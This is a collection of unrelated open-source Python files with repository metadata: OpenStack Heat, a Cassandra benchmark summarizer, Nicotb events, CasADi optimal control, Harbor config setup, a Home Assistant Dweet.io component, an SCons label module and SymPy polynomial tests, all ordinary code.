msg = (_('Database %(dbs)s specified for user does '
'not exist in databases for resource %(name)s.')
% {'dbs': missing_db, 'name': self.name})
raise exception.StackValidationFailed(message=msg)
# check validity of NICS
is_neutron = self.is_using_neutron()
nics = self.properties[self.NICS]
for nic in nics:
if not is_neutron and nic.get(self.PORT):
msg = _("Can not use %s property on Nova-network.") % self.PORT
raise exception.StackValidationFailed(message=msg)
if bool(nic.get(self.NET)) == bool(nic.get(self.PORT)):
msg = _("Either %(net)s or %(port)s must be provided.") % {
'net': self.NET, 'port': self.PORT}
raise exception.StackValidationFailed(message=msg)
def href(self):
if not self._href and self.dbinstance:
if not self.dbinstance.links:
self._href = None
else:
for link in self.dbinstance.links:
if link['rel'] == 'self':
self._href = link[self.HREF]
break
return self._href
def _resolve_attribute(self, name):
if self.resource_id is None:
return
if name == self.HOSTNAME:
return self.dbinstance.hostname
elif name == self.HREF:
return self.href()
def resource_mapping():
return {
'OS::Trove::Instance': Instance,
}
|
openstack/heat
|
heat/engine/resources/openstack/trove/instance.py
|
Python
|
apache-2.0
| 29,344
| 0
|
#!/usr/bin/python
import re
import csv
import os
import json
def read_csv(fn):
results = {}
with open(fn, 'rb') as csvfile:
rows = csv.reader(csvfile, delimiter=',')
for row in rows:
m = re.search('Total Transactions', row[1])
if len(row) == 7 and m:
temp = results.get(row[0])
if not temp:
results[row[0]] = {row[1]: float(row[2]), row[3]: float(row[4])}
else:
results[row[0]] = {row[1]: float(row[2]) + temp.get(row[1]),
row[3]: float(row[4]) + temp.get(row[3])}
results[row[0]]['Throughput'] = results[row[0]][row[1]] / results[row[0]][row[3]]
return results
def traverse_all_csvs(path_to_dir):
files = []
for (dirpath, dirnames, filenames) in os.walk(path_to_dir):
for fn in filenames:
m = re.search('^collections-([\-D0-9]*).csv$', fn)
if m:
files.append(fn)
break
return files
if __name__ == '__main__':
results = {}
files = traverse_all_csvs(os.path.dirname(os.path.realpath(__file__)))
for fn in files:
m = re.search('^collections-([\-D0-9]*).csv$', fn)
results[m.group(1)] = read_csv(fn)
print json.dumps(results, indent=4, separators=(',', ': '))
with open('compilation.json', 'w') as outfile:
json.dump(results, outfile, sort_keys=True, indent=4, separators=(',', ': '))
rows = [['Type', 'Total Transactions', 'Time used', 'Throughput']]
for key, value in results.iteritems():
rows.append([key, '-', '-', '-'])
for k1, v1 in value.iteritems():
rows.append([k1, v1['Total Transactions'], v1['Time used'], v1['Throughput']])
with open('compilation.csv', 'wb') as f:
writer = csv.writer(f)
writer.writerows(rows)
|
franklingu/Cassandra-benchmarking
|
benchmarking/sum_up.py
|
Python
|
mit
| 1,889
| 0.004764
|
# Copyright (C) 2017,2019, Yu Sheng Lin, johnjohnlys@media.ee.ntu.edu.tw
# This file is part of Nicotb.
# Nicotb is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# Nicotb is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with Nicotb. If not, see <http://www.gnu.org/licenses/>.
from nicotb.common import *
from collections import deque
event_released = set()
waiting_coro = list()
event_queue = deque()
def CreateEvent(hier: str = ""):
if event_released:
n = event_released.pop()
else:
n = len(waiting_coro)
waiting_coro.append(list())
if COSIM and hier:
BindEvent(n, (TOP_PREFIX+hier).encode())
return n
def CreateEvents(descs: list):
return [CreateEvent(event) for event in descs]
def GetEvent(ev):
return ev if isinstance(ev, int) else CreateEvent(ev)
def SignalEvent(ev, all_ev=True):
event_queue.append((ev, all_ev))
def DestroyEvent(ev: int):
# Do not destroy events created with hier name
waiting_coro[ev] = list()
event_released.add(ev)
# Initialize a default event, so coroutines can implement SystemC-like dont_initialize
INIT_EVENT = CreateEvent()
SignalEvent(INIT_EVENT)
|
johnjohnlin/nicotb
|
lib/event.py
|
Python
|
gpl-3.0
| 1,550
| 0.013548
|
#
# This file is part of CasADi.
#
# CasADi -- A symbolic framework for dynamic optimization.
# Copyright (C) 2010 by Joel Andersson, Moritz Diehl, K.U.Leuven. All rights reserved.
#
# CasADi is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# CasADi is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with CasADi; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
#
# -*- coding: utf-8 -*-
import os
import sys
from numpy import *
import numpy as NP
import matplotlib.pyplot as plt
import zipfile
# JModelica
from jmodelica.jmi import compile_jmu
from jmodelica.jmi import JMUModel
import jmodelica
# CasADi
from casadi import *
curr_dir = os.path.dirname(os.path.abspath(__file__));
try:
# Try the old Jmodelica syntax
jmu_name = compile_jmu("VDP_pack.VDP_Opt", curr_dir+"/VDP.mop",'optimica','ipopt',{'generate_xml_equations':True, 'generate_fmi_xml':False})
except jmodelica.compiler.UnknownOptionError:
# Try the new jmodelica syntax
jmu_name = compile_jmu("VDP_pack.VDP_Opt", curr_dir+"/VDP.mop",'optimica','ipopt',{'generate_xml_equations':True, 'generate_fmi_me_xml':False})
if True:
vdp = JMUModel(jmu_name)
res = vdp.optimize()
# Extract variable profiles
x1=res['x1']
x2=res['x2']
u=res['u']
t=res['time']
cost=res['cost']
# Plot
plt.figure(1)
plt.clf()
plt.subplot(311)
plt.plot(t,x1)
plt.grid()
plt.ylabel('x1')
plt.subplot(312)
plt.plot(t,x2)
plt.grid()
plt.ylabel('x2')
plt.subplot(313)
plt.plot(t,u)
plt.grid()
plt.ylabel('u')
plt.xlabel('time')
sfile = zipfile.ZipFile(curr_dir+'/VDP_pack_VDP_Opt.jmu','r')
mfile = sfile.extract('modelDescription.xml','.')
os.remove('VDP_pack_VDP_Opt.jmu')
os.rename('modelDescription.xml','vdp.xml')
# Allocate a parser and load the xml
parser = FMIParser('vdp.xml')
# Dump representation to screen
print "XML representation"
print parser
# Obtain the symbolic representation of the OCP
ocp = parser.parse()
# Print the ocp to screen
print ocp
# Sort the variables according to type
var = OCPVariables(ocp.variables)
# The right hand side of the ACADO functions
acado_in = ACADO_FCN_NUM_IN * [[]]
# Time
acado_in[ACADO_FCN_T] = [var.t_]
# Convert stl vector of variables to list of expressions
def toList(v, der=False):
ret = []
for i in v:
if der:
ret.append(i.der())
else:
ret.append(i.var())
return ret
# Differential state
acado_in[ACADO_FCN_XD] = toList(ocp.x_)
# Algebraic state
acado_in[ACADO_FCN_XA] = toList(ocp.z_)
# Control
acado_in[ACADO_FCN_U] = toList(ocp.u_)
# Parameter
acado_in[ACADO_FCN_P] = toList(ocp.p_)
# State derivative
acado_in[ACADO_FCN_XDOT] = toList(ocp.x_,True)
# The DAE function
ffcn_out = list(ocp.dae) + list(ocp.ae)
ffcn = SXFunction(acado_in,[ffcn_out])
# Objective function
mfcn = SXFunction(acado_in,[ocp.mterm])
# Path constraint function
cfcn = SXFunction(acado_in,[ocp.cfcn])
# Initial constraint function
rfcn = SXFunction(acado_in,[ocp.initeq])
# Create ACADO solver
ocp_solver = AcadoInterface(ffcn,mfcn,cfcn,rfcn)
# Create an integrator
dae_in = DAE_NUM_IN * [[]]
dae_in[DAE_T] = acado_in[ACADO_FCN_T]
dae_in[DAE_Y] = acado_in[ACADO_FCN_XD] + acado_in[ACADO_FCN_XA]
dae_in[DAE_YDOT] = acado_in[ACADO_FCN_XDOT] + list(ssym("zdot",len(acado_in[ACADO_FCN_XA])))
dae_in[DAE_P] = acado_in[ACADO_FCN_P] + acado_in[ACADO_FCN_U]
dae = SXFunction(dae_in,[ffcn_out])
integrator = IdasIntegrator(dae)
#integrator.setOption("exact_jacobian",True)
#integrator.setOption("linear_multistep_method","bdf") # adams or bdf
#integrator.setOption("nonlinear_solver_iteration","newton") # newton or functional
integrator.setOption("number_of_fwd_dir",4)
integrator.setOption("number_of_adj_dir",0)
integrator.setOption("fsens_err_con",True)
integrator.setOption("quad_err_con",True)
integrator.setOption("abstol",1e-8)
integrator.setOption("reltol",1e-8)
integrator.setOption("is_differential",len(acado_in[ACADO_FCN_XD])*[1] + len(acado_in[ACADO_FCN_XA])*[0])
# Pass the integrator to ACADO
ocp_solver.setIntegrator(integrator)
# Set options
ocp_solver.setOption("start_time",ocp.t0)
ocp_solver.setOption("final_time",ocp.tf)
num_nodes = 30
ocp_solver.setOption("number_of_shooting_nodes",num_nodes)
ocp_solver.setOption("max_num_iterations",100)
ocp_solver.setOption("kkt_tolerance",1e-4)
ocp_solver.setOption("integrator","casadi")
ocp_solver.setOption("integrator_tolerance",1e-6)
# Initialize
ocp_solver.init()
# Set bounds on states
cfcn_lb = []
for i in ocp.cfcn_lb:
cfcn_lb.append(float(i))
ocp_solver.setInput(cfcn_lb,"lbc")
cfcn_ub = []
for i in ocp.cfcn_ub:
cfcn_ub.append(float(i))
ocp_solver.setInput(cfcn_ub,"ubc")
# Solve the optimal control problem
ocp_solver.solve()
# Print optimal cost
cost = ocp_solver.getOutputData(ACADO_COST)[0]
print "optimal cost = ", cost
# Print optimal parameters
popt = ocp_solver.getOutputData(ACADO_P_OPT)
print "optimal parameter values = ", popt
# Time grid
t_opt = NP.linspace(0,ocp.tf,num_nodes+1)
# Plot optimal control
u_opt = ocp_solver.getOutputData(ACADO_U_OPT)
plt.figure(3)
plt.plot(t_opt,u_opt)
# Plot optimal state trajectory
x_opt = ocp_solver.getOutputData(ACADO_X_OPT)
x_opt = array(x_opt) # create numpy array
x_opt = x_opt.reshape(num_nodes+1, 3)
plt.figure(4)
plt.plot(t_opt,x_opt)
# Show the plots
plt.ion()
plt.show()
|
jgillis/casadi
|
experimental/joel/vdp/vdp.py
|
Python
|
lgpl-3.0
| 5,909
| 0.019293
|
"""empty message
Revision ID: 4fe34588268f
Revises: 26dba2ff3e74
Create Date: 2014-12-09 01:41:24.333058
"""
# revision identifiers, used by Alembic.
revision = '4fe34588268f'
down_revision = '26dba2ff3e74'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
pass
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
pass
### end Alembic commands ###
|
sandeep6189/Pmp-Webapp
|
migrations/versions/4fe34588268f_.py
|
Python
|
bsd-3-clause
| 506
| 0.011858
|
import os
from g import config_dir, templates_dir, DEFAULT_GID, DEFAULT_UID
from utils.misc import prepare_dir
from utils.jinja import render_jinja
registryctl_config_dir = os.path.join(config_dir, "registryctl")
registryctl_config_template_path = os.path.join(templates_dir, "registryctl", "config.yml.jinja")
registryctl_conf = os.path.join(config_dir, "registryctl", "config.yml")
registryctl_env_template_path = os.path.join(templates_dir, "registryctl", "env.jinja")
registryctl_conf_env = os.path.join(config_dir, "registryctl", "env")
levels_map = {
'debug': 'debug',
'info': 'info',
'warning': 'warn',
'error': 'error',
'fatal': 'fatal'
}
def prepare_registry_ctl(config_dict):
# prepare dir
prepare_dir(registryctl_config_dir)
# Render Registryctl env
render_jinja(
registryctl_env_template_path,
registryctl_conf_env,
**config_dict)
# Render Registryctl config
render_jinja(
registryctl_config_template_path,
registryctl_conf,
uid=DEFAULT_UID,
gid=DEFAULT_GID,
level=levels_map[config_dict['log_level']],
**config_dict)
|
wy65701436/harbor
|
make/photon/prepare/utils/registry_ctl.py
|
Python
|
apache-2.0
| 1,152
| 0.002604
|
import time
import test_rnd as rnd
import random
import pysos
# initialize the data
N = 1234
items = [(rnd.utf8(20), rnd.utf8(200)) for i in range(N)]
start = time.time()
db = pysos.Dict('temp/sos_dict')
#import shelve
#db = shelve.open('temp.shelve')
print("%.2fs: %d items loaded" % (time.time() - start, len(db)))
# add all items
for key,val in items:
db[key] = val
print("%.2fs: %d items added" % (time.time() - start, len(items)))
# read all keys
random.shuffle(items)
for key,val in items:
val2 = db[key]
assert val2 == val
print("%.2fs: %d items read" % (time.time() - start, len(items)))
# update all values
random.shuffle(items)
for key,val in items:
db[key] = 'updated ' + val
print("%.2fs: %d items updated" % (time.time() - start, len(items)))
# read all keys again
random.shuffle(items)
for key,val in items:
val2 = db[key]
assert val2 == 'updated ' + val
print("%.2fs: %d items read" % (time.time() - start, len(items)))
# delete all keys
random.shuffle(items)
for key,val in items:
del db[key]
print("%.2fs: %d items deleted" % (time.time() - start, len(items)))
# add all keys
random.shuffle(items)
for key,val in items:
db[key] ='again ' + val
print("%.2fs: %d items added" % (time.time() - start, len(items)))
# read all keys again
random.shuffle(items)
for key,val in items:
val = db[key]
print("%.2fs: %d items read" % (time.time() - start, len(items)))
N = len(db)
db.close()
print("%.2fs: DB closed containing %d item" % (time.time() - start, N))
#print("free lines: %d" % len(db._free_lines))
|
dagnelies/pysos
|
test_dict.py
|
Python
|
apache-2.0
| 1,567
| 0.007658
|
import sys
import argparse
import pickle
def read_index(pickleFile):
pickleFile = open(pickleFile, 'rb')
index = pickle.load(pickleFile)
return index
def main(args):
wordIndex = read_index('indice.pickle')
docIndex = read_index('indice_doc.pickle')
wordList = args.palabras
for word in wordList:
print wordIndex[word]
# print docIndex
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Busca palabras')
parser.add_argument('palabras', metavar='N', type=str, nargs='+', help='Palabras a buscar en el indice')
args = parser.parse_args()
main(args)
|
chrisRubiano/TAP
|
indexing/buscar.py
|
Python
|
gpl-3.0
| 633
| 0.00158
|
"""
A component which allows you to send data to Dweet.io.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/dweet/
"""
import logging
from datetime import timedelta
import voluptuous as vol
from homeassistant.const import EVENT_STATE_CHANGED, STATE_UNKNOWN
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers import state as state_helper
from homeassistant.util import Throttle
_LOGGER = logging.getLogger(__name__)
DOMAIN = "dweet"
DEPENDENCIES = []
REQUIREMENTS = ['dweepy==0.2.0']
CONF_NAME = 'name'
CONF_WHITELIST = 'whitelist'
MIN_TIME_BETWEEN_UPDATES = timedelta(seconds=1)
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
vol.Required(CONF_NAME): cv.string,
vol.Required(CONF_WHITELIST): cv.string,
}),
}, extra=vol.ALLOW_EXTRA)
# pylint: disable=too-many-locals
def setup(hass, config):
"""Setup the Dweet.io component."""
conf = config[DOMAIN]
name = conf[CONF_NAME]
whitelist = conf.get(CONF_WHITELIST, [])
json_body = {}
def dweet_event_listener(event):
"""Listen for new messages on the bus and sends them to Dweet.io."""
state = event.data.get('new_state')
if state is None or state.state in (STATE_UNKNOWN, '') \
or state.entity_id not in whitelist:
return
try:
_state = state_helper.state_as_number(state)
except ValueError:
_state = state.state
json_body[state.attributes.get('friendly_name')] = _state
send_data(name, json_body)
hass.bus.listen(EVENT_STATE_CHANGED, dweet_event_listener)
return True
@Throttle(MIN_TIME_BETWEEN_UPDATES)
def send_data(name, msg):
"""Send the collected data to Dweet.io."""
import dweepy
try:
dweepy.dweet_for(name, msg)
except dweepy.DweepyError:
_LOGGER.error("Error saving data '%s' to Dweet.io", msg)
|
mikaelboman/home-assistant
|
homeassistant/components/dweet.py
|
Python
|
mit
| 1,961
| 0
|
# Copyright (c) 2013 Che-Liang Chiou
import os
import re
from SCons.Script import Dir
class Label(object):
VALID_NAME = re.compile(r'^[A-Za-z0-9_.\-/]+$')
@classmethod
def make_label(cls, label_str):
package_str = None
target_str = None
if not isinstance(label_str, str):
# Assume it is a SCons File node.
label_str = label_str.srcnode().path
package_str, target_str = os.path.split(label_str)
elif label_str.startswith('#'):
label_str = label_str[1:]
if ':' in label_str:
package_str, target_str = label_str.split(':', 1)
else:
package_str = label_str
elif label_str.startswith(':'):
target_str = label_str[1:]
else:
target_str = label_str
package_name = PackageName.make_package_name(package_str)
if not target_str:
target_str = os.path.basename(package_name.path)
target_name = TargetName(target_str)
return cls(package_name, target_name)
@classmethod
def make_label_list(cls, label_strs):
if isinstance(label_strs, str):
label_strs = label_strs.split()
return [cls.make_label(label_str) for label_str in label_strs]
@staticmethod
def check_name(name):
if not name:
raise ValueError('empty name')
if name.startswith('/') or name.endswith('/'):
raise ValueError('leading or trailing path separator: %s' % name)
if '//' in name:
raise ValueError('consecutive path separators: %s' % name)
if not Label.VALID_NAME.match(name):
raise ValueError('invalid name character: %s' % name)
def __init__(self, package_name, target_name):
assert isinstance(package_name, PackageName)
assert isinstance(target_name, TargetName)
self.package_name = package_name
self.target_name = target_name
def __str__(self):
return '#%s:%s' % (self.package_name, self.target_name)
def __repr__(self):
return '%s("%s")' % (self.__class__.__name__, str(self))
def __eq__(self, other):
return (self.__class__ is other.__class__ and
self.package_name == other.package_name and
self.target_name == other.target_name)
def __ne__(self, other):
return not (self == other)
def __hash__(self):
return hash(repr(self))
@property
def path(self):
return os.path.join(self.package_name.path, self.target_name.path)
class LabelOfRule(Label):
pass
class LabelOfFile(Label):
pass
class PackageName(object):
@classmethod
def make_package_name(cls, package_str=None):
assert package_str is None or isinstance(package_str, str)
if not package_str:
package_str = Dir('.').srcnode().path
return cls(package_str)
def __init__(self, package_name):
assert isinstance(package_name, str)
Label.check_name(package_name)
self.package_name = package_name
def __str__(self):
return self.package_name
def __repr__(self):
return 'PackageName("%s")' % self.package_name
def __eq__(self, other):
return (self.__class__ is other.__class__ and
self.package_name == other.package_name)
def __ne__(self, other):
return not (self == other)
def __hash__(self):
return hash(self.package_name)
@property
def path(self):
return self.package_name
class TargetName(object):
def __init__(self, target_name):
assert isinstance(target_name, str)
Label.check_name(target_name)
self.target_name = target_name
def __str__(self):
return self.target_name
def __repr__(self):
return 'TargetName("%s")' % self.target_name
def __eq__(self, other):
return (self.__class__ is other.__class__ and
self.target_name == other.target_name)
def __ne__(self, other):
return not (self == other)
def __hash__(self):
return hash(self.target_name)
@property
def path(self):
return self.target_name
|
clchiou/scons_package
|
label.py
|
Python
|
mit
| 4,231
| 0
|
"""Tests for user-friendly public interface to polynomial functions. """
from sympy.polys.polytools import (
Poly, PurePoly, poly,
parallel_poly_from_expr,
degree, degree_list,
LC, LM, LT,
pdiv, prem, pquo, pexquo,
div, rem, quo, exquo,
half_gcdex, gcdex, invert,
subresultants,
resultant, discriminant,
terms_gcd, cofactors,
gcd, gcd_list,
lcm, lcm_list,
trunc,
monic, content, primitive,
compose, decompose,
sturm,
gff_list, gff,
sqf_norm, sqf_part, sqf_list, sqf,
factor_list, factor,
intervals, refine_root, count_roots,
real_roots, nroots, ground_roots,
nth_power_roots_poly,
cancel, reduced, groebner,
GroebnerBasis, is_zero_dimensional,
_torational_factor_list,
to_rational_coeffs)
from sympy.polys.polyerrors import (
MultivariatePolynomialError,
ExactQuotientFailed,
PolificationFailed,
ComputationFailed,
UnificationFailed,
RefinementFailed,
GeneratorsNeeded,
GeneratorsError,
PolynomialError,
CoercionFailed,
DomainError,
OptionError,
FlagError)
from sympy.polys.polyclasses import DMP
from sympy.polys.fields import field
from sympy.polys.domains import FF, ZZ, QQ, RR, EX
from sympy.polys.domains.realfield import RealField
from sympy.polys.orderings import lex, grlex, grevlex
from sympy import (
S, Integer, Rational, Float, Mul, Symbol, sqrt, Piecewise,
exp, sin, tanh, expand, oo, I, pi, re, im, RootOf, Eq, Tuple, Expr)
from sympy.core.basic import _aresame
from sympy.core.compatibility import iterable
from sympy.core.mul import _keep_coeff
from sympy.utilities.pytest import raises, XFAIL
from sympy.abc import a, b, c, d, p, q, t, w, x, y, z
from sympy import MatrixSymbol
def _epsilon_eq(a, b):
for x, y in zip(a, b):
if abs(x - y) > 1e-10:
return False
return True
def _strict_eq(a, b):
if type(a) == type(b):
if iterable(a):
if len(a) == len(b):
return all(_strict_eq(c, d) for c, d in zip(a, b))
else:
return False
else:
return isinstance(a, Poly) and a.eq(b, strict=True)
else:
return False
def test_Poly_from_dict():
K = FF(3)
assert Poly.from_dict(
{0: 1, 1: 2}, gens=x, domain=K).rep == DMP([K(2), K(1)], K)
assert Poly.from_dict(
{0: 1, 1: 5}, gens=x, domain=K).rep == DMP([K(2), K(1)], K)
assert Poly.from_dict(
{(0,): 1, (1,): 2}, gens=x, domain=K).rep == DMP([K(2), K(1)], K)
assert Poly.from_dict(
{(0,): 1, (1,): 5}, gens=x, domain=K).rep == DMP([K(2), K(1)], K)
assert Poly.from_dict({(0, 0): 1, (1, 1): 2}, gens=(
x, y), domain=K).rep == DMP([[K(2), K(0)], [K(1)]], K)
assert Poly.from_dict({0: 1, 1: 2}, gens=x).rep == DMP([ZZ(2), ZZ(1)], ZZ)
assert Poly.from_dict(
{0: 1, 1: 2}, gens=x, field=True).rep == DMP([QQ(2), QQ(1)], QQ)
assert Poly.from_dict(
{0: 1, 1: 2}, gens=x, domain=ZZ).rep == DMP([ZZ(2), ZZ(1)], ZZ)
assert Poly.from_dict(
{0: 1, 1: 2}, gens=x, domain=QQ).rep == DMP([QQ(2), QQ(1)], QQ)
assert Poly.from_dict(
{(0,): 1, (1,): 2}, gens=x).rep == DMP([ZZ(2), ZZ(1)], ZZ)
assert Poly.from_dict(
{(0,): 1, (1,): 2}, gens=x, field=True).rep == DMP([QQ(2), QQ(1)], QQ)
assert Poly.from_dict(
{(0,): 1, (1,): 2}, gens=x, domain=ZZ).rep == DMP([ZZ(2), ZZ(1)], ZZ)
assert Poly.from_dict(
{(0,): 1, (1,): 2}, gens=x, domain=QQ).rep == DMP([QQ(2), QQ(1)], QQ)
assert Poly.from_dict({(1,): sin(y)}, gens=x, composite=False) == \
Poly(sin(y)*x, x, domain='EX')
assert Poly.from_dict({(1,): y}, gens=x, composite=False) == \
Poly(y*x, x, domain='EX')
assert Poly.from_dict({(1, 1): 1}, gens=(x, y), composite=False) == \
Poly(x*y, x, y, domain='ZZ')
assert Poly.from_dict({(1, 0): y}, gens=(x, z), composite=False) == \
Poly(y*x, x, z, domain='EX')
def test_Poly_from_list():
K = FF(3)
assert Poly.from_list([2, 1], gens=x, domain=K).rep == DMP([K(2), K(1)], K)
assert Poly.from_list([5, 1], gens=x, domain=K).rep == DMP([K(2), K(1)], K)
assert Poly.from_list([2, 1], gens=x).rep == DMP([ZZ(2), ZZ(1)], ZZ)
assert Poly.from_list([2, 1], gens=x, field=True).rep == DMP([QQ(2), QQ(1)], QQ)
assert Poly.from_list([2, 1], gens=x, domain=ZZ).rep == DMP([ZZ(2), ZZ(1)], ZZ)
assert Poly.from_list([2, 1], gens=x, domain=QQ).rep == DMP([QQ(2), QQ(1)], QQ)
assert Poly.from_list([0, 1.0], gens=x).rep == DMP([RR(1.0)], RR)
assert Poly.from_list([1.0, 0], gens=x).rep == DMP([RR(1.0), RR(0.0)], RR)
raises(MultivariatePolynomialError, lambda: Poly.from_list([[]], gens=(x, y)))
def test_Poly_from_poly():
f = Poly(x + 7, x, domain=ZZ)
g = Poly(x + 2, x, modulus=3)
h = Poly(x + y, x, y, domain=ZZ)
K = FF(3)
assert Poly.from_poly(f) == f
assert Poly.from_poly(f, domain=K).rep == DMP([K(1), K(1)], K)
assert Poly.from_poly(f, domain=ZZ).rep == DMP([1, 7], ZZ)
assert Poly.from_poly(f, domain=QQ).rep == DMP([1, 7], QQ)
assert Poly.from_poly(f, gens=x) == f
assert Poly.from_poly(f, gens=x, domain=K).rep == DMP([K(1), K(1)], K)
assert Poly.from_poly(f, gens=x, domain=ZZ).rep == DMP([1, 7], ZZ)
assert Poly.from_poly(f, gens=x, domain=QQ).rep == DMP([1, 7], QQ)
assert Poly.from_poly(f, gens=y) == Poly(x + 7, y, domain='ZZ[x]')
raises(CoercionFailed, lambda: Poly.from_poly(f, gens=y, domain=K))
raises(CoercionFailed, lambda: Poly.from_poly(f, gens=y, domain=ZZ))
raises(CoercionFailed, lambda: Poly.from_poly(f, gens=y, domain=QQ))
assert Poly.from_poly(f, gens=(x, y)) == Poly(x + 7, x, y, domain='ZZ')
assert Poly.from_poly(
f, gens=(x, y), domain=ZZ) == Poly(x + 7, x, y, domain='ZZ')
assert Poly.from_poly(
f, gens=(x, y), domain=QQ) == Poly(x + 7, x, y, domain='QQ')
assert Poly.from_poly(
f, gens=(x, y), modulus=3) == Poly(x + 7, x, y, domain='FF(3)')
K = FF(2)
assert Poly.from_poly(g) == g
assert Poly.from_poly(g, domain=ZZ).rep == DMP([1, -1], ZZ)
raises(CoercionFailed, lambda: Poly.from_poly(g, domain=QQ))
assert Poly.from_poly(g, domain=K).rep == DMP([K(1), K(0)], K)
assert Poly.from_poly(g, gens=x) == g
assert Poly.from_poly(g, gens=x, domain=ZZ).rep == DMP([1, -1], ZZ)
raises(CoercionFailed, lambda: Poly.from_poly(g, gens=x, domain=QQ))
assert Poly.from_poly(g, gens=x, domain=K).rep == DMP([K(1), K(0)], K)
K = FF(3)
assert Poly.from_poly(h) == h
assert Poly.from_poly(
h, domain=ZZ).rep == DMP([[ZZ(1)], [ZZ(1), ZZ(0)]], ZZ)
assert Poly.from_poly(
h, domain=QQ).rep == DMP([[QQ(1)], [QQ(1), QQ(0)]], QQ)
assert Poly.from_poly(h, domain=K).rep == DMP([[K(1)], [K(1), K(0)]], K)
assert Poly.from_poly(h, gens=x) == Poly(x + y, x, domain=ZZ[y])
raises(CoercionFailed, lambda: Poly.from_poly(h, gens=x, domain=ZZ))
assert Poly.from_poly(
h, gens=x, domain=ZZ[y]) == Poly(x + y, x, domain=ZZ[y])
raises(CoercionFailed, lambda: Poly.from_poly(h, gens=x, domain=QQ))
assert Poly.from_poly(
h, gens=x, domain=QQ[y]) == Poly(x + y, x, domain=QQ[y])
raises(CoercionFailed, lambda: Poly.from_poly(h, gens=x, modulus=3))
assert Poly.from_poly(h, gens=y) == Poly(x + y, y, domain=ZZ[x])
raises(CoercionFailed, lambda: Poly.from_poly(h, gens=y, domain=ZZ))
assert Poly.from_poly(
h, gens=y, domain=ZZ[x]) == Poly(x + y, y, domain=ZZ[x])
raises(CoercionFailed, lambda: Poly.from_poly(h, gens=y, domain=QQ))
assert Poly.from_poly(
h, gens=y, domain=QQ[x]) == Poly(x + y, y, domain=QQ[x])
raises(CoercionFailed, lambda: Poly.from_poly(h, gens=y, modulus=3))
assert Poly.from_poly(h, gens=(x, y)) == h
assert Poly.from_poly(
h, gens=(x, y), domain=ZZ).rep == DMP([[ZZ(1)], [ZZ(1), ZZ(0)]], ZZ)
assert Poly.from_poly(
h, gens=(x, y), domain=QQ).rep == DMP([[QQ(1)], [QQ(1), QQ(0)]], QQ)
assert Poly.from_poly(
h, gens=(x, y), domain=K).rep == DMP([[K(1)], [K(1), K(0)]], K)
assert Poly.from_poly(
h, gens=(y, x)).rep == DMP([[ZZ(1)], [ZZ(1), ZZ(0)]], ZZ)
assert Poly.from_poly(
h, gens=(y, x), domain=ZZ).rep == DMP([[ZZ(1)], [ZZ(1), ZZ(0)]], ZZ)
assert Poly.from_poly(
h, gens=(y, x), domain=QQ).rep == DMP([[QQ(1)], [QQ(1), QQ(0)]], QQ)
assert Poly.from_poly(
h, gens=(y, x), domain=K).rep == DMP([[K(1)], [K(1), K(0)]], K)
assert Poly.from_poly(
h, gens=(x, y), field=True).rep == DMP([[QQ(1)], [QQ(1), QQ(0)]], QQ)
assert Poly.from_poly(
h, gens=(x, y), field=True).rep == DMP([[QQ(1)], [QQ(1), QQ(0)]], QQ)
def test_Poly_from_expr():
raises(GeneratorsNeeded, lambda: Poly.from_expr(S(0)))
raises(GeneratorsNeeded, lambda: Poly.from_expr(S(7)))
F3 = FF(3)
assert Poly.from_expr(x + 5, domain=F3).rep == DMP([F3(1), F3(2)], F3)
assert Poly.from_expr(y + 5, domain=F3).rep == DMP([F3(1), F3(2)], F3)
assert Poly.from_expr(x + 5, x, domain=F3).rep == DMP([F3(1), F3(2)], F3)
assert Poly.from_expr(y + 5, y, domain=F3).rep == DMP([F3(1), F3(2)], F3)
assert Poly.from_expr(x + y, domain=F3).rep == DMP([[F3(1)], [F3(1), F3(0)]], F3)
assert Poly.from_expr(x + y, x, y, domain=F3).rep == DMP([[F3(1)], [F3(1), F3(0)]], F3)
assert Poly.from_expr(x + 5).rep == DMP([1, 5], ZZ)
assert Poly.from_expr(y + 5).rep == DMP([1, 5], ZZ)
assert Poly.from_expr(x + 5, x).rep == DMP([1, 5], ZZ)
assert Poly.from_expr(y + 5, y).rep == DMP([1, 5], ZZ)
assert Poly.from_expr(x + 5, domain=ZZ).rep == DMP([1, 5], ZZ)
assert Poly.from_expr(y + 5, domain=ZZ).rep == DMP([1, 5], ZZ)
assert Poly.from_expr(x + 5, x, domain=ZZ).rep == DMP([1, 5], ZZ)
assert Poly.from_expr(y + 5, y, domain=ZZ).rep == DMP([1, 5], ZZ)
assert Poly.from_expr(x + 5, x, y, domain=ZZ).rep == DMP([[1], [5]], ZZ)
assert Poly.from_expr(y + 5, x, y, domain=ZZ).rep == DMP([[1, 5]], ZZ)
def test_Poly__new__():
raises(GeneratorsError, lambda: Poly(x + 1, x, x))
raises(GeneratorsError, lambda: Poly(x + y, x, y, domain=ZZ[x]))
raises(GeneratorsError, lambda: Poly(x + y, x, y, domain=ZZ[y]))
raises(OptionError, lambda: Poly(x, x, symmetric=True))
raises(OptionError, lambda: Poly(x + 2, x, modulus=3, domain=QQ))
raises(OptionError, lambda: Poly(x + 2, x, domain=ZZ, gaussian=True))
raises(OptionError, lambda: Poly(x + 2, x, modulus=3, gaussian=True))
raises(OptionError, lambda: Poly(x + 2, x, domain=ZZ, extension=[sqrt(3)]))
raises(OptionError, lambda: Poly(x + 2, x, modulus=3, extension=[sqrt(3)]))
